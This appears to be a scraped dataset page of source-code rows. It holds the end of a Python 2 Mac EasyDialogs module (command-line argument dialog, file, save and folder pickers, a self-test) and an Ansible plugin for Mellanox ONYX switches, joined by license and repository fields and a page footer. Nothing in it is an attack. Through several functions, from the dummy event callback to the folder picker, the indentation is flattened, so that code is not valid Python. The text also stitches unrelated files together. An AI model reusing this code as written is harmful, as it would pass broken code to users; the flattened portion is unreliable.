                idx = d.GetDialogItemAsControl(ARGV_OPTION_GROUP).GetControlValue()-1
                _selectoption(d, optionlist, idx)
            elif n == ARGV_OPTION_VALUE:
                pass
            elif n == ARGV_OPTION_ADD:
                # Add the selected option (plus its value, if it takes one).
                idx = d.GetDialogItemAsControl(ARGV_OPTION_GROUP).GetControlValue()-1
                if 0 <= idx < len(optionlist):
                    option = optionlist[idx]
                    if type(option) == type(()):
                        option = option[0]
                    if option[-1] == '=' or option[-1] == ':':
                        option = option[:-1]
                        h = d.GetDialogItemAsControl(ARGV_OPTION_VALUE)
                        value = Dlg.GetDialogItemText(h)
                    else:
                        value = ''
                    # Single-letter options get '-', long options '--'.
                    if len(option) == 1:
                        stringtoadd = '-' + option
                    else:
                        stringtoadd = '--' + option
                    stringstoadd = [stringtoadd]
                    if value:
                        stringstoadd.append(value)
                else:
                    MacOS.SysBeep()
            elif n == ARGV_COMMAND_GROUP:
                # Subcommand popup changed: refresh its help text.
                idx = d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).GetControlValue()-1
                if 0 <= idx < len(commandlist) and type(commandlist[idx]) == type(()) and \
                        len(commandlist[idx]) > 1:
                    help = commandlist[idx][-1]
                    h = d.GetDialogItemAsControl(ARGV_COMMAND_EXPLAIN)
                    Dlg.SetDialogItemText(h, help)
            elif n == ARGV_COMMAND_ADD:
                # Add the selected subcommand word.
                idx = d.GetDialogItemAsControl(ARGV_COMMAND_GROUP).GetControlValue()-1
                if 0 <= idx < len(commandlist):
                    command = commandlist[idx]
                    if type(command) == type(()):
                        command = command[0]
                    stringstoadd = [command]
                else:
                    MacOS.SysBeep()
            elif n == ARGV_ADD_OLDFILE:
                pathname = AskFileForOpen()
                if pathname:
                    stringstoadd = [pathname]
            elif n == ARGV_ADD_NEWFILE:
                pathname = AskFileForSave()
                if pathname:
                    stringstoadd = [pathname]
            elif n == ARGV_ADD_FOLDER:
                pathname = AskFolder()
                if pathname:
                    stringstoadd = [pathname]
            elif n == ARGV_CMDLINE_DATA:
                pass # Nothing to do
            else:
                raise RuntimeError, "Unknown dialog item %d"%n
            # Append the collected words to the visible command line,
            # quoting (via repr) words containing quotes or spaces.
            for stringtoadd in stringstoadd:
                if '"' in stringtoadd or "'" in stringtoadd or " " in stringtoadd:
                    stringtoadd = repr(stringtoadd)
                h = d.GetDialogItemAsControl(ARGV_CMDLINE_DATA)
                oldstr = GetDialogItemText(h)
                if oldstr and oldstr[-1] != ' ':
                    oldstr = oldstr + ' '
                oldstr = oldstr + stringtoadd
                if oldstr[-1] != ' ':
                    oldstr = oldstr + ' '
                SetDialogItemText(h, oldstr)
                d.SelectDialogItemText(ARGV_CMDLINE_DATA, 0x7fff, 0x7fff)
        # OK was hit: split the final command line back into words,
        # re-joining and unquoting '"..."' and "'...'" quoted arguments.
        h = d.GetDialogItemAsControl(ARGV_CMDLINE_DATA)
        oldstr = GetDialogItemText(h)
        tmplist = string.split(oldstr)
        newlist = []
        while tmplist:
            item = tmplist[0]
            del tmplist[0]
            if item[0] == '"':
                while item[-1] != '"':
                    if not tmplist:
                        raise RuntimeError, "Unterminated quoted argument"
                    item = item + ' ' + tmplist[0]
                    del tmplist[0]
                item = item[1:-1]
            if item[0] == "'":
                while item[-1] != "'":
                    if not tmplist:
                        raise RuntimeError, "Unterminated quoted argument"
                    item = item + ' ' + tmplist[0]
                    del tmplist[0]
                item = item[1:-1]
            newlist.append(item)
        return newlist
    finally:
        # Restore normal scheduling and drop the dialog even on error.
        if hasattr(MacOS, 'SchedParams'):
            MacOS.SchedParams(*appsw)
        del d
def _process_Nav_args(dftflags, **args):
    """Normalize keyword arguments for the Nav.Nav* dialog calls.

    Drops None-valued arguments, defaults 'dialogOptionFlags' to
    *dftflags*, converts 'defaultLocation' to an AEDesc and 'typeList'
    to an 'open'-resource Handle.  Returns (args, tpwanted) where
    tpwanted is the requested result type taken from the 'wanted'
    argument (default str).
    """
    import Carbon.AppleEvents
    import Carbon.AE
    import Carbon.File
    # Drop unspecified arguments.  (Python 2 keys() returns a list, so
    # deleting while iterating over it is safe here.)
    for k in args.keys():
        if args[k] is None:
            del args[k]
    # Set some defaults, and modify some arguments
    if not args.has_key('dialogOptionFlags'):
        args['dialogOptionFlags'] = dftflags
    # Wrap a default location given as FSSpec, FSRef or pathname into the
    # AEDesc form Navigation Services expects.
    if args.has_key('defaultLocation') and \
            not isinstance(args['defaultLocation'], Carbon.AE.AEDesc):
        defaultLocation = args['defaultLocation']
        if isinstance(defaultLocation, Carbon.File.FSSpec):
            args['defaultLocation'] = Carbon.AE.AECreateDesc(
                    Carbon.AppleEvents.typeFSS, defaultLocation.data)
        else:
            if not isinstance(defaultLocation, Carbon.File.FSRef):
                defaultLocation = Carbon.File.FSRef(defaultLocation)
            args['defaultLocation'] = Carbon.AE.AECreateDesc(
                    Carbon.AppleEvents.typeFSRef, defaultLocation.data)
    # Pack a sequence of 4-char file types into an in-memory 'open'
    # resource.  NOTE: Carbon.Res and struct are assumed to be imported
    # at module level (not visible in this chunk) — confirm.
    if args.has_key('typeList') and not isinstance(args['typeList'], Carbon.Res.ResourceType):
        typeList = args['typeList'][:]
        # Workaround for OSX typeless files:
        if 'TEXT' in typeList and not '\0\0\0\0' in typeList:
            typeList = typeList + ('\0\0\0\0',)
        data = 'Pyth' + struct.pack("hh", 0, len(typeList))
        for type in typeList:
            data = data+type
        args['typeList'] = Carbon.Res.Handle(data)
    # 'wanted' is consumed here rather than passed through to Nav.
    tpwanted = str
    if args.has_key('wanted'):
        tpwanted = args['wanted']
        del args['wanted']
    return args, tpwanted
def _dummy_Nav_eventproc(msg, data):
pass
# Module-wide Navigation Services event callback; replaceable through
# SetDefaultEventProc() below.
_default_Nav_eventproc = _dummy_Nav_eventproc
def SetDefaultEventProc(proc):
    """Install *proc* as the default Navigation Services event callback.

    Passing None restores the built-in no-op callback.  Returns the
    callback that was previously installed.
    """
    global _default_Nav_eventproc
    previous = _default_Nav_eventproc
    _default_Nav_eventproc = _dummy_Nav_eventproc if proc is None else proc
    return previous
def AskFileForOpen(
message=None,
typeList=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
previewProc=None,
filterProc=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for a file to open.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x56 # Or 0xe4?
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,previewProc=previewProc,
filterProc=filterProc,typeList=typeList,wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavChooseFile(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
return tpwanted(rr.selection_fsr[0])
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, str):
return tpwanted(rr.selection_fsr[0].as_pathname())
if issubclass(tpwanted, unicode):
return tpwanted(rr.selection_fsr[0].as_pathname(), 'utf8')
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def AskFileForSave(
message=None,
savedFileName=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
fileType=None,
fileCreator=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for a filename to save to.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x07
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
savedFileName=savedFileName,message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,fileType=fileType,
fileCreator=fileCreator,wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavPutFile(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
raise TypeError, "Cannot pass wanted=FSRef to AskFileForSave"
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, (str, unicode)):
if sys.platform == 'mac':
fullpath = rr.selection[0].as_pathname()
else:
# This is gross, and probably incorrect too
vrefnum, dirid, name = rr.selection[0].as_tuple()
pardir_fss = Carbon.File.FSSpec((vrefnum, dirid, ''))
pardir_fsr = Carbon.File.FSRef(pardir_fss)
pardir_path = pardir_fsr.FSRefMakePath() # This is utf-8
name_utf8 = unicode(name, 'macroman').encode('utf8')
fullpath = os.path.join(pardir_path, name_utf8)
if issubclass(tpwanted, unicode):
return unicode(fullpath, 'utf8')
return tpwanted(fullpath)
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def AskFolder(
message=None,
# From here on the order is not documented
version=None,
defaultLocation=None,
dialogOptionFlags=None,
location=None,
clientName=None,
windowTitle=None,
actionButtonLabel=None,
cancelButtonLabel=None,
preferenceKey=None,
popupExtension=None,
eventProc=_dummy_Nav_eventproc,
filterProc=None,
wanted=None,
multiple=None):
"""Display a dialog asking the user for select a folder.
wanted is the return type wanted: FSSpec, FSRef, unicode or string (default)
the other arguments can be looked up in Apple's Navigation Services documentation"""
default_flags = 0x17
args, tpwanted = _process_Nav_args(default_flags, version=version,
defaultLocation=defaultLocation, dialogOptionFlags=dialogOptionFlags,
location=location,clientName=clientName,windowTitle=windowTitle,
actionButtonLabel=actionButtonLabel,cancelButtonLabel=cancelButtonLabel,
message=message,preferenceKey=preferenceKey,
popupExtension=popupExtension,eventProc=eventProc,filterProc=filterProc,
wanted=wanted,multiple=multiple)
_interact()
try:
rr = Nav.NavChooseFolder(args)
good = 1
except Nav.error, arg:
if arg[0] != -128: # userCancelledErr
raise Nav.error, arg
return None
if not rr.validRecord or not rr.selection:
return None
if issubclass(tpwanted, Carbon.File.FSRef):
return tpwanted(rr.selection_fsr[0])
if issubclass(tpwanted, Carbon.File.FSSpec):
return tpwanted(rr.selection[0])
if issubclass(tpwanted, str):
return tpwanted(rr.selection_fsr[0].as_pathname())
if issubclass(tpwanted, unicode):
return tpwanted(rr.selection_fsr[0].as_pathname(), 'utf8')
raise TypeError, "Unknown value for argument 'wanted': %s" % repr(tpwanted)
def test():
    """Interactive smoke test exercising every EasyDialogs entry point."""
    import time
    Message("Testing EasyDialogs.")
    # Sample getopt-style options and subcommands for GetArgv().
    optionlist = (('v', 'Verbose'), ('verbose', 'Verbose as long option'),
            ('flags=', 'Valued option'), ('f:', 'Short valued option'))
    commandlist = (('start', 'Start something'), ('stop', 'Stop something'))
    argv = GetArgv(optionlist=optionlist, commandlist=commandlist, addoldfile=0)
    Message("Command line: %s"%' '.join(argv))
    for i in range(len(argv)):
        print 'arg[%d] = %r' % (i, argv[i])
    ok = AskYesNoCancel("Do you want to proceed?")
    ok = AskYesNoCancel("Do you want to identify?", yes="Identify", no="No")
    if ok > 0:
        s = AskString("Enter your first name", "Joe")
        s2 = AskPassword("Okay %s, tell us your nickname"%s, s, cancel="None")
        if not s2:
            Message("%s has no secret nickname"%s)
        else:
            Message("Hello everybody!!\nThe secret nickname of %s is %s!!!"%(s, s2))
    else:
        s = 'Anonymous'
    rv = AskFileForOpen(message="Gimme a file, %s"%s, wanted=Carbon.File.FSSpec)
    Message("rv: %s"%rv)
    # NOTE(review): AskFileForSave explicitly raises TypeError for
    # wanted=FSRef — this call looks like it would always fail; confirm.
    rv = AskFileForSave(wanted=Carbon.File.FSRef, savedFileName="%s.txt"%s)
    Message("rv.as_pathname: %s"%rv.as_pathname())
    rv = AskFolder()
    Message("Folder name: %s"%rv)
    # Exercise both indeterminate (inc) and determinate (set) progress bars.
    text = ( "Working Hard...", "Hardly Working..." ,
            "So far, so good!", "Keep on truckin'" )
    bar = ProgressBar("Progress, progress...", 0, label="Ramping up...")
    try:
        if hasattr(MacOS, 'SchedParams'):
            appsw = MacOS.SchedParams(1, 0)
        for i in xrange(20):
            bar.inc()
            time.sleep(0.05)
        bar.set(0,100)
        for i in xrange(100):
            bar.set(i)
            time.sleep(0.05)
            # Rotate the label every 10 steps (Py2 integer division).
            if i % 10 == 0:
                bar.label(text[(i/10) % 4])
        bar.label("Done.")
        time.sleep(1.0) # give'em a chance to see "Done."
    finally:
        # Dropping the bar closes its window; then restore scheduling.
        del bar
        if hasattr(MacOS, 'SchedParams'):
            MacOS.SchedParams(*appsw)
# Run the interactive self-test when executed as a script.
if __name__ == '__main__':
    try:
        test()
    except KeyboardInterrupt:
        Message("Operation Canceled.")
| lgpl-2.1 |
Dhivyap/ansible | lib/ansible/plugins/cliconf/onyx.py | 31 | 2827 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
cliconf: onyx
short_description: Use onyx cliconf to run command on Mellanox ONYX platform
description:
- This onyx plugin provides low level abstraction apis for
sending and receiving CLI commands from Mellanox ONYX network devices.
version_added: "2.5"
"""
import json
from itertools import chain
from ansible.module_utils._text import to_text
from ansible.module_utils.network.common.utils import to_list
from ansible.plugins.cliconf import CliconfBase, enable_mode
class Cliconf(CliconfBase):
    """Cliconf implementation for Mellanox ONYX network devices."""

    def get_device_info(self):
        """Collect OS name/version/model and hostname from the device."""
        version_reply = self.get('show version | json-print')
        version_data = json.loads(version_reply)
        device_info = {
            'network_os': version_data['Product name'],
            'network_os_version': version_data['Product release'],
            'network_os_version_summary': version_data['Version summary'],
            'network_os_model': version_data['Product model'],
        }
        hosts_reply = self.get('show hosts | include Hostname')
        hosts_text = to_text(hosts_reply, errors='surrogate_or_strict').strip()
        # Output looks like "Hostname: <name>"; keep the part after the colon.
        device_info['network_os_hostname'] = hosts_text.split(':')[1].strip()
        return device_info

    @enable_mode
    def get_config(self, source='running', format='text', flags=None):
        """Return the device configuration; only the running config is supported."""
        if source != 'running':
            return self.invalid_params("fetching configuration from %s is not supported" % source)
        return self.send_command('show running-config')

    @enable_mode
    def edit_config(self, command):
        """Apply configuration *command* lines inside a configure-terminal session."""
        for line in chain(['configure terminal'], to_list(command), ['exit']):
            self.send_command(line)

    def get(self, command, prompt=None, answer=None, sendonly=False, newline=True, check_all=False):
        """Send a single command to the device and return its output."""
        return self.send_command(command=command, prompt=prompt, answer=answer,
                                 sendonly=sendonly, newline=newline,
                                 check_all=check_all)

    def get_capabilities(self):
        """Return the base capability dictionary encoded as JSON."""
        capabilities = super(Cliconf, self).get_capabilities()
        return json.dumps(capabilities)
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.